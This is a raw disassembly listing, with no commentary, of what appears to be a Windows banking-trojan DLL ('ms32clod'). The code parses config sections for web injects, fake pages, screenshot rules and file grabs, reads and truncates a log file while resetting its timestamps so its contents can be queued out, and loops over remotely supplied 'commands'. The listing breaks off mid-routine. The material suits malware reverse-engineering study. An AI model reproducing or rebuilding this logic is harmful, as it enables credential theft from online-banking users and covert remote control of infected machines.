loc_10009610: ; CODE XREF: sub_1000878F+D8E�j
; sub_1000878F+E11�j
jmp loc_100094EA
; ---------------------------------------------------------------------------
loc_10009615: ; CODE XREF: sub_1000878F+D71�j
push 0
push offset aLimits ; "limits"
lea eax, [ebp+var_2C8]
push eax
lea ecx, [ebp+var_14]
call sub_1001A916
mov [ebp+var_418], eax
mov ecx, [ebp+var_418]
mov [ebp+var_41C], ecx
mov byte ptr [ebp+var_4], 0Bh
mov edx, [ebp+var_41C]
push edx
lea ecx, [ebp+var_10]
call sub_1001A8A2
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_2C8]
call sub_1001A728
push 8 ; Size
call ds:malloc ; malloc
add esp, 4
mov dword_10034260, eax
push 8 ; Size
push 0 ; Val
mov eax, dword_10034260
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 0 ; int
push offset aNum ; "num"
push 0 ; int
push offset aInject_10 ; "inject"
mov ecx, dword_10034260
mov edx, [ecx]
push edx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2CC], esp
lea eax, [ebp+var_10]
push eax
call sub_1001A8C7
mov [ebp+var_420], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_424], eax
mov ecx, dword_10034260
mov edx, [ebp+var_424]
mov [ecx], edx
push 0 ; int
push offset aRep ; "rep"
push 0 ; int
push offset aInject_11 ; "inject"
mov eax, dword_10034260
mov ecx, [eax+4]
push ecx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2D0], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_428], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_42C], eax
mov eax, dword_10034260
mov ecx, [ebp+var_42C]
mov [eax+4], ecx
push 8 ; Size
call ds:malloc ; malloc
add esp, 4
mov dword_10030228, eax
push 8 ; Size
push 0 ; Val
mov edx, dword_10030228
push edx ; Dst
call memset ; memset
add esp, 0Ch
push 0 ; int
push offset aNum_0 ; "num"
push 0 ; int
push offset aScsh ; "scsh"
mov eax, dword_10030228
mov ecx, [eax]
push ecx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2D4], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_430], eax
call sub_1000827F
add esp, 18h
mov dword ptr [ebp+var_434], eax
mov eax, dword_10030228
mov ecx, dword ptr [ebp+var_434]
mov [eax], ecx
push 0 ; int
push offset aRep_0 ; "rep"
push 0 ; int
push offset aScsh_0 ; "scsh"
mov edx, dword_10030228
mov eax, [edx+4]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2D8], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_438], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_43C], eax
mov eax, dword_10030228
mov ecx, [ebp+var_43C]
mov [eax+4], ecx
push 8 ; Size
call ds:malloc ; malloc
add esp, 4
mov dword_1002C20C, eax
push 8 ; Size
push 0 ; Val
mov edx, dword_1002C20C
push edx ; Dst
call memset ; memset
add esp, 0Ch
push 0 ; int
push offset aNum_1 ; "num"
push 0 ; int
push offset aGp ; "gp"
mov eax, dword_1002C20C
mov ecx, [eax]
push ecx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2DC], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_440], eax
call sub_1000827F
add esp, 18h
mov dword ptr [ebp+var_444], eax
mov eax, dword_1002C20C
mov ecx, dword ptr [ebp+var_444]
mov [eax], ecx
push 0 ; int
push offset aRep_1 ; "rep"
push 0 ; int
push offset aGp_0 ; "gp"
mov edx, dword_1002C20C
mov eax, [edx+4]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2E0], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_448], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_44C], eax
mov eax, dword_1002C20C
mov ecx, [ebp+var_44C]
mov [eax+4], ecx
push 0
push offset aFakes ; "fakes"
lea edx, [ebp+var_2E4]
push edx
lea ecx, [ebp+var_14]
call sub_1001A916
mov [ebp+var_450], eax
mov eax, [ebp+var_450]
mov [ebp+var_454], eax
mov byte ptr [ebp+var_4], 0Ch
mov ecx, [ebp+var_454]
push ecx
lea ecx, [ebp+var_10]
call sub_1001A8A2
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_2E4]
call sub_1001A728
push offset aFake ; "fake"
lea ecx, [ebp+var_10]
call sub_1001A8DB
mov [ebp+var_128], eax
mov [ebp+var_18], 0
jmp short loc_100098F6
; ---------------------------------------------------------------------------
loc_100098ED: ; CODE XREF: sub_1000878F+13AA�j
mov edx, [ebp+var_18]
add edx, 1
mov [ebp+var_18], edx
loc_100098F6: ; CODE XREF: sub_1000878F+115C�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_128]
jge loc_10009B3E
push 18h ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_18]
mov dword_1003F130[ecx*4], eax
push 18h ; Size
push 0 ; Val
mov edx, [ebp+var_18]
mov eax, dword_1003F130[edx*4]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 0 ; int
push offset aUrl_2 ; "url"
mov ecx, [ebp+var_18]
push ecx ; int
push offset aFake_0 ; "fake"
mov edx, [ebp+var_18]
mov eax, dword_1003F130[edx*4]
mov ecx, [eax]
push ecx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2E8], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_458], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_45C], eax
mov eax, [ebp+var_18]
mov ecx, dword_1003F130[eax*4]
mov edx, [ebp+var_45C]
mov [ecx], edx
push 0 ; int
push offset aParam ; "param"
mov eax, [ebp+var_18]
push eax ; int
push offset aFake_1 ; "fake"
mov ecx, [ebp+var_18]
mov edx, dword_1003F130[ecx*4]
mov eax, [edx+4]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2EC], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_460], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_464], eax
mov eax, [ebp+var_18]
mov ecx, dword_1003F130[eax*4]
mov edx, [ebp+var_464]
mov [ecx+4], edx
push 1 ; int
push offset aItem1 ; "item1"
mov eax, [ebp+var_18]
push eax ; int
push offset aFake_2 ; "fake"
mov ecx, [ebp+var_18]
mov edx, dword_1003F130[ecx*4]
mov eax, [edx+8]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2F0], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_468], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_46C], eax
mov eax, [ebp+var_18]
mov ecx, dword_1003F130[eax*4]
mov edx, [ebp+var_46C]
mov [ecx+8], edx
push 1 ; int
push offset aItem2 ; "item2"
mov eax, [ebp+var_18]
push eax ; int
push offset aFake_3 ; "fake"
mov ecx, [ebp+var_18]
mov edx, dword_1003F130[ecx*4]
mov eax, [edx+0Ch]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2F4], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_470], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_474], eax
mov eax, [ebp+var_18]
mov ecx, dword_1003F130[eax*4]
mov edx, [ebp+var_474]
mov [ecx+0Ch], edx
push 0 ; int
push offset aType_0 ; "type"
mov eax, [ebp+var_18]
push eax ; int
push offset aFake_4 ; "fake"
mov ecx, [ebp+var_18]
mov edx, dword_1003F130[ecx*4]
mov eax, [edx+10h]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2F8], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_478], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_47C], eax
mov eax, [ebp+var_18]
mov ecx, dword_1003F130[eax*4]
mov edx, [ebp+var_47C]
mov [ecx+10h], edx
push 0 ; int
push offset aRtype ; "rtype"
mov eax, [ebp+var_18]
push eax ; int
push offset aFake_5 ; "fake"
mov ecx, [ebp+var_18]
mov edx, dword_1003F130[ecx*4]
mov eax, [edx+14h]
push eax ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_2FC], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_480], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_484], eax
mov eax, [ebp+var_18]
mov ecx, dword_1003F130[eax*4]
mov edx, [ebp+var_484]
mov [ecx+14h], edx
jmp loc_100098ED
; ---------------------------------------------------------------------------
loc_10009B3E: ; CODE XREF: sub_1000878F+1170�j
push 0
push offset aScshs ; "scshs"
lea eax, [ebp+var_300]
push eax
lea ecx, [ebp+var_14]
call sub_1001A916
mov [ebp+var_488], eax
mov ecx, [ebp+var_488]
mov [ebp+var_48C], ecx
mov byte ptr [ebp+var_4], 0Dh
mov edx, [ebp+var_48C]
push edx
lea ecx, [ebp+var_10]
call sub_1001A8A2
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_300]
call sub_1001A728
push offset aScsh_1 ; "scsh"
lea ecx, [ebp+var_10]
call sub_1001A8DB
mov [ebp+var_128], eax
mov [ebp+var_18], 0
jmp short loc_10009BAD
; ---------------------------------------------------------------------------
loc_10009BA4: ; CODE XREF: sub_1000878F+1505�j
mov eax, [ebp+var_18]
add eax, 1
mov [ebp+var_18], eax
loc_10009BAD: ; CODE XREF: sub_1000878F+1413�j
mov ecx, [ebp+var_18]
cmp ecx, [ebp+var_128]
jge loc_10009C99
push 8 ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, [ebp+var_18]
mov dword_1003F770[edx*4], eax
push 8 ; Size
push 0 ; Val
mov eax, [ebp+var_18]
mov ecx, dword_1003F770[eax*4]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 0 ; int
push offset aUrl_3 ; "url"
mov edx, [ebp+var_18]
push edx ; int
push offset aScsh_2 ; "scsh"
mov eax, [ebp+var_18]
mov ecx, dword_1003F770[eax*4]
mov edx, [ecx]
push edx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_304], esp
lea eax, [ebp+var_10]
push eax
call sub_1001A8C7
mov [ebp+var_490], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_494], eax
mov ecx, [ebp+var_18]
mov edx, dword_1003F770[ecx*4]
mov eax, [ebp+var_494]
mov [edx], eax
push 1 ; int
push offset aParam_0 ; "param"
mov ecx, [ebp+var_18]
push ecx ; int
push offset aScsh_3 ; "scsh"
mov edx, [ebp+var_18]
mov eax, dword_1003F770[edx*4]
mov ecx, [eax+4]
push ecx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_308], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_498], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_49C], eax
mov eax, [ebp+var_18]
mov ecx, dword_1003F770[eax*4]
mov edx, [ebp+var_49C]
mov [ecx+4], edx
jmp loc_10009BA4
; ---------------------------------------------------------------------------
loc_10009C99: ; CODE XREF: sub_1000878F+1427�j
push 0
push offset aMultiscshs ; "multiscshs"
lea eax, [ebp+var_30C]
push eax
lea ecx, [ebp+var_14]
call sub_1001A916
mov [ebp+var_4A0], eax
mov ecx, [ebp+var_4A0]
mov [ebp+var_4A4], ecx
mov byte ptr [ebp+var_4], 0Eh
mov edx, [ebp+var_4A4]
push edx
lea ecx, [ebp+var_10]
call sub_1001A8A2
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_30C]
call sub_1001A728
push offset aMultiscsh ; "multiscsh"
lea ecx, [ebp+var_10]
call sub_1001A8DB
mov [ebp+var_128], eax
mov [ebp+var_18], 0
jmp short loc_10009D08
; ---------------------------------------------------------------------------
loc_10009CFF: ; CODE XREF: sub_1000878F+1660�j
mov eax, [ebp+var_18]
add eax, 1
mov [ebp+var_18], eax
loc_10009D08: ; CODE XREF: sub_1000878F+156E�j
mov ecx, [ebp+var_18]
cmp ecx, [ebp+var_128]
jge loc_10009DF4
push 8 ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, [ebp+var_18]
mov dword_10043770[edx*4], eax
push 8 ; Size
push 0 ; Val
mov eax, [ebp+var_18]
mov ecx, dword_10043770[eax*4]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 0 ; int
push offset aUrl_4 ; "url"
mov edx, [ebp+var_18]
push edx ; int
push offset aMultiscsh_0 ; "multiscsh"
mov eax, [ebp+var_18]
mov ecx, dword_10043770[eax*4]
mov edx, [ecx]
push edx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_310], esp
lea eax, [ebp+var_10]
push eax
call sub_1001A8C7
mov [ebp+var_4A8], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_4AC], eax
mov ecx, [ebp+var_18]
mov edx, dword_10043770[ecx*4]
mov eax, [ebp+var_4AC]
mov [edx], eax
push 1 ; int
push offset aParam_1 ; "param"
mov ecx, [ebp+var_18]
push ecx ; int
push offset aMultiscsh_1 ; "multiscsh"
mov edx, [ebp+var_18]
mov eax, dword_10043770[edx*4]
mov ecx, [eax+4]
push ecx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_314], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_4B0], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_4B4], eax
mov eax, [ebp+var_18]
mov ecx, dword_10043770[eax*4]
mov edx, [ebp+var_4B4]
mov [ecx+4], edx
jmp loc_10009CFF
; ---------------------------------------------------------------------------
loc_10009DF4: ; CODE XREF: sub_1000878F+1582�j
push 0
push offset aGfs ; "gfs"
lea eax, [ebp+var_318]
push eax
lea ecx, [ebp+var_14]
call sub_1001A916
mov [ebp+var_4B8], eax
mov ecx, [ebp+var_4B8]
mov [ebp+var_4BC], ecx
mov byte ptr [ebp+var_4], 0Fh
mov edx, [ebp+var_4BC]
push edx
lea ecx, [ebp+var_10]
call sub_1001A8A2
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_318]
call sub_1001A728
push offset aGf ; "gf"
lea ecx, [ebp+var_10]
call sub_1001A8DB
mov [ebp+var_128], eax
mov [ebp+var_18], 0
jmp short loc_10009E63
; ---------------------------------------------------------------------------
loc_10009E5A: ; CODE XREF: sub_1000878F+17BB�j
mov eax, [ebp+var_18]
add eax, 1
mov [ebp+var_18], eax
loc_10009E63: ; CODE XREF: sub_1000878F+16C9�j
mov ecx, [ebp+var_18]
cmp ecx, [ebp+var_128]
jge loc_10009F4F
push 8 ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, [ebp+var_18]
mov dword_10047770[edx*4], eax
push 8 ; Size
push 0 ; Val
mov eax, [ebp+var_18]
mov ecx, dword_10047770[eax*4]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 0 ; int
push offset aUrl_5 ; "url"
mov edx, [ebp+var_18]
push edx ; int
push offset aGf_0 ; "gf"
mov eax, [ebp+var_18]
mov ecx, dword_10047770[eax*4]
mov edx, [ecx]
push edx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_31C], esp
lea eax, [ebp+var_10]
push eax
call sub_1001A8C7
mov [ebp+var_4C0], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_4C4], eax
mov ecx, [ebp+var_18]
mov edx, dword_10047770[ecx*4]
mov eax, [ebp+var_4C4]
mov [edx], eax
push 1 ; int
push offset aParam_2 ; "param"
mov ecx, [ebp+var_18]
push ecx ; int
push offset aGf_1 ; "gf"
mov edx, [ebp+var_18]
mov eax, dword_10047770[edx*4]
mov ecx, [eax+4]
push ecx ; lpString1
push ecx ; char
mov ecx, esp
mov [ebp+var_320], esp
lea edx, [ebp+var_10]
push edx
call sub_1001A8C7
mov [ebp+var_4C8], eax
call sub_1000827F
add esp, 18h
mov [ebp+var_4CC], eax
mov eax, [ebp+var_18]
mov ecx, dword_10047770[eax*4]
mov edx, [ebp+var_4CC]
mov [ecx+4], edx
jmp loc_10009E5A
; ---------------------------------------------------------------------------
loc_10009F4F: ; CODE XREF: sub_1000878F+16DD�j
mov [ebp+var_324], 1
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_10]
call sub_1001A728
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_14]
call sub_1001A728
mov eax, [ebp+var_324]
jmp short loc_10009FD4
; ---------------------------------------------------------------------------
loc_10009F7C: ; CODE XREF: sub_1000878F+F2�j
mov [ebp+var_328], 0
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_10]
call sub_1001A728
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_14]
call sub_1001A728
mov eax, [ebp+var_328]
jmp short loc_10009FD4
; ---------------------------------------------------------------------------
loc_10009FA9: ; CODE XREF: sub_1000878F+8F�j
mov [ebp+var_32C], 0
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_10]
call sub_1001A728
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_14]
call sub_1001A728
mov eax, [ebp+var_32C]
loc_10009FD4: ; CODE XREF: sub_1000878F+17EB�j
; sub_1000878F+1818�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_1000878F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10009FE2(LPCSTR Str, int)
sub_10009FE2 proc near ; CODE XREF: sub_1000291D+19A�p
; sub_1000A318+F0�p
var_114 = dword ptr -114h
hObject = dword ptr -110h
var_10C = dword ptr -10Ch
NumberOfBytesRead= dword ptr -108h
String2 = byte ptr -104h
var_103 = byte ptr -103h
lpString = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 114h
push edi
mov [ebp+var_10C], 0
mov [ebp+var_114], 0
mov [ebp+lpString], 0
mov [ebp+String2], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_103]
rep stosd
stosw
push offset dword_10034264 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_10022050
push ecx ; Str
call sub_100010BB
add esp, 0Ch
push eax
push offset byte_1006A924
push offset aSS_9 ; "%s%s"
lea edx, [ebp+String2]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 7 ; dwShareMode
push 0C0000000h ; dwDesiredAccess
mov eax, [ebp+Str]
push eax ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz short loc_1000A091
push 0 ; lpFileSizeHigh
mov ecx, [ebp+hObject]
push ecx ; hFile
call ds:GetFileSize ; GetFileSize
mov [ebp+var_114], eax
loc_1000A091: ; CODE XREF: sub_10009FE2+98�j
mov edx, [ebp+var_114]
add edx, 1
push edx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString], eax
mov eax, [ebp+var_114]
add eax, 1
push eax ; Size
push 0 ; Val
mov ecx, [ebp+lpString]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
cmp [ebp+var_114], 0BB8h
jnb short loc_1000A0EE
cmp [ebp+arg_4], 0
jnz short loc_1000A0EE
cmp [ebp+hObject], 0FFFFFFFFh
jz short loc_1000A0E7
mov edx, [ebp+hObject]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000A0E7: ; CODE XREF: sub_10009FE2+F6�j
xor eax, eax
jmp loc_1000A313
; ---------------------------------------------------------------------------
loc_1000A0EE: ; CODE XREF: sub_10009FE2+E7�j
; sub_10009FE2+ED�j
cmp [ebp+hObject], 0FFFFFFFFh
jz short loc_1000A164
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
mov ecx, [ebp+var_114]
add ecx, 1
push ecx ; nNumberOfBytesToRead
mov edx, [ebp+lpString]
push edx ; lpBuffer
mov eax, [ebp+hObject]
push eax ; hFile
call ds:ReadFile ; ReadFile
push 0 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push 0 ; lDistanceToMove
mov ecx, [ebp+hObject]
push ecx ; hFile
call ds:SetFilePointer ; SetFilePointer
mov edx, [ebp+hObject]
push edx ; hFile
call ds:SetEndOfFile ; SetEndOfFile
push offset CreationTime ; lpLastWriteTime
push offset CreationTime ; lpLastAccessTime
push offset CreationTime ; lpCreationTime
mov eax, [ebp+hObject]
push eax ; hFile
call ds:SetFileTime ; SetFileTime
mov ecx, [ebp+hObject]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000A164: ; CODE XREF: sub_10009FE2+113�j
; sub_10009FE2+1AD�j
mov edx, [ebp+var_10C]
cmp dword_1004B770[edx*4], 0
jz short loc_1000A191
cmp [ebp+var_10C], 1000h
jnb short loc_1000A191
mov eax, [ebp+var_10C]
add eax, 1
mov [ebp+var_10C], eax
jmp short loc_1000A164
; ---------------------------------------------------------------------------
loc_1000A191: ; CODE XREF: sub_10009FE2+190�j
; sub_10009FE2+19C�j
push 310h ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_10C]
mov dword_1004B770[ecx*4], eax
push offset dword_10034264 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_10022050
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax
push offset byte_1006A924
push offset aSS_10 ; "%s%s"
lea ecx, [ebp+String2]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
lea edx, [ebp+String2]
push edx ; lpString2
mov eax, [ebp+var_10C]
mov ecx, dword_1004B770[eax*4]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, [ebp+var_10C]
mov eax, dword_1004B770[edx*4]
mov ecx, [ebp+lpString]
mov [eax+100h], ecx
mov edx, [ebp+lpString]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
mov ecx, [ebp+var_10C]
mov edx, dword_1004B770[ecx*4]
mov [edx+104h], eax
push offset byte_10073990 ; lpString2
mov eax, [ebp+var_10C]
mov ecx, dword_1004B770[eax*4]
add ecx, 108h
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, [ebp+var_10C]
mov eax, dword_1004B770[edx*4]
mov ecx, [ebp+var_10C]
mov [eax+308h], ecx
mov edx, [ebp+var_10C]
mov eax, dword_1004B770[edx*4]
mov dword ptr [eax+30Ch], 0
push offset dword_10034264 ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, off_10022078
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; SubStr
mov eax, [ebp+Str]
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_1000A2D4
push offset byte_10065ED8
push offset aS___all ; "%s__.all"
mov ecx, [ebp+var_10C]
mov edx, dword_1004B770[ecx*4]
add edx, 207h
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
jmp short loc_1000A2FB
; ---------------------------------------------------------------------------
loc_1000A2D4: ; CODE XREF: sub_10009FE2+2C7�j
push offset byte_10065ED8
push offset aS___log ; "%s__.log"
mov eax, [ebp+var_10C]
mov ecx, dword_1004B770[eax*4]
add ecx, 207h
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
loc_1000A2FB: ; CODE XREF: sub_10009FE2+2F0�j
mov edx, [ebp+var_10C]
mov eax, dword_1004B770[edx*4]
push eax ; LPVOID
call StartAddress
mov eax, 1
loc_1000A313: ; CODE XREF: sub_10009FE2+107�j
pop edi
mov esp, ebp
pop ebp
retn
sub_10009FE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_1000A318(LPVOID)
sub_1000A318 proc near ; DATA XREF: sub_1000AF7F+17�o
var_914 = dword ptr -914h
var_910 = dword ptr -910h
var_90C = dword ptr -90Ch
var_908 = dword ptr -908h
var_904 = dword ptr -904h
var_900 = dword ptr -900h
var_8FC = dword ptr -8FCh
var_8F8 = dword ptr -8F8h
var_8F4 = dword ptr -8F4h
var_8F0 = dword ptr -8F0h
var_8EC = dword ptr -8ECh
var_8E8 = byte ptr -8E8h
var_8E4 = byte ptr -8E4h
var_8E0 = byte ptr -8E0h
var_8DC = byte ptr -8DCh
var_8D8 = dword ptr -8D8h
var_8D4 = byte ptr -8D4h
var_8D3 = byte ptr -8D3h
var_4D4 = byte ptr -4D4h
hFile = dword ptr -4D0h
var_4CC = byte ptr -4CCh
var_4CB = byte ptr -4CBh
hKey = dword ptr -3CCh
var_3C8 = dword ptr -3C8h
Filename = byte ptr -3BCh
var_3BB = byte ptr -3BBh
var_2BC = byte ptr -2BCh
lpBuffer = dword ptr -2B8h
hObject = dword ptr -2B4h
NumberOfBytesWritten= dword ptr -2B0h
Str = byte ptr -2ACh
var_28C = byte ptr -28Ch
var_28B = byte ptr -28Bh
FileName = byte ptr -18Ch
var_18B = byte ptr -18Bh
String2 = byte ptr -8Ch
Buffer = byte ptr -4Ch
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_1000A318
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 908h
push edi
mov [ebp+var_4CC], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_4CB]
rep stosd
stosw
mov [ebp+var_28C], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_28B]
rep stosd
stosw
lea ecx, [ebp+var_2BC]
call ??0_Container_base@std@@QAE@XZ_0 ; std::_Container_base::_Container_base(void)
mov [ebp+var_4], 0
mov [ebp+Filename], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_3BB]
rep stosd
stosw
mov [ebp+FileName], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_18B]
rep stosd
stosw
mov [ebp+lpBuffer], 0
push 0FFh ; uSize
lea eax, [ebp+Filename]
push eax ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
push offset asc_10023030 ; "\\"
lea ecx, [ebp+Filename]
push ecx ; lpString1
call ds:lstrcatA ; lstrcatA
push offset dword_10034264 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_10022078
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
lea ecx, [ebp+Filename]
push ecx ; lpString1
call ds:lstrcatA ; lstrcatA
push 1 ; int
lea edx, [ebp+Filename]
push edx ; Str
call sub_10009FE2
add esp, 8
push 0FFh ; nSize
lea eax, [ebp+Filename]
push eax ; lpFilename
push offset aMs32clod_6 ; "ms32clod"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
push 5Ch ; Ch
lea ecx, [ebp+Filename]
push ecx ; Str
call ds:strrchr ; strrchr
add esp, 8
mov byte ptr [eax+1], 0
push offset dword_10034264 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_10022068
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; Source
lea ecx, [ebp+Filename]
push ecx ; Dest
call strcat ; strcat
add esp, 8
lea edx, [ebp+Filename]
push edx ; Filename
call sub_100189B8
add esp, 4
test eax, eax
jz loc_1000AF4C
lea eax, [ebp+var_3C8]
push eax ; int
push offset aCommands ; "commands"
lea ecx, [ebp+Filename]
push ecx ; Filename
lea edx, [ebp+var_8D8]
push edx ; int
call sub_1001A057
add esp, 10h
mov [ebp+var_8F0], eax
mov eax, [ebp+var_8F0]
mov [ebp+var_8F4], eax
mov byte ptr [ebp+var_4], 1
mov ecx, [ebp+var_8F4]
push ecx
lea ecx, [ebp+var_2BC]
call sub_1001A8A2
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_8D8]
call sub_1001A728
cmp [ebp+var_3C8], 0
jnz loc_1000AF3F
loc_1000A4EB: ; CODE XREF: sub_1000A318:loc_1000AF3A�j
push offset aCommand ; "command"
lea ecx, [ebp+var_2BC]
call sub_1001A8DB
test eax, eax
jle loc_1000AF3F
push offset byte_10073994 ; lpString2
lea edx, [ebp+Str]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push offset byte_10073998 ; lpString2
lea eax, [ebp+Buffer]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
push offset byte_1007399C ; lpString2
lea ecx, [ebp+String2]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push 0
push offset aCmd ; "cmd"
push 0
push offset aCommand_0 ; "command"
lea edx, [ebp+var_8DC]
push edx
lea ecx, [ebp+var_2BC]
call sub_1001A97C
mov [ebp+var_8F8], eax
mov eax, [ebp+var_8F8]
mov [ebp+var_8FC], eax
mov byte ptr [ebp+var_4], 2
mov ecx, [ebp+var_8FC]
call sub_1001A9E3
push eax ; lpString2
lea ecx, [ebp+Str]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_8DC]
call sub_1001A728
push 0
push offset aParam1 ; "param1"
push 0
push offset aCommand_1 ; "command"
lea edx, [ebp+var_8E0]
push edx
lea ecx, [ebp+var_2BC]
call sub_1001A97C
mov [ebp+var_900], eax
mov eax, [ebp+var_900]
mov [ebp+var_904], eax
mov byte ptr [ebp+var_4], 3
mov ecx, [ebp+var_904]
call sub_1001A9E3
push eax ; lpString2
lea ecx, [ebp+Buffer]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_8E0]
call sub_1001A728
push 0
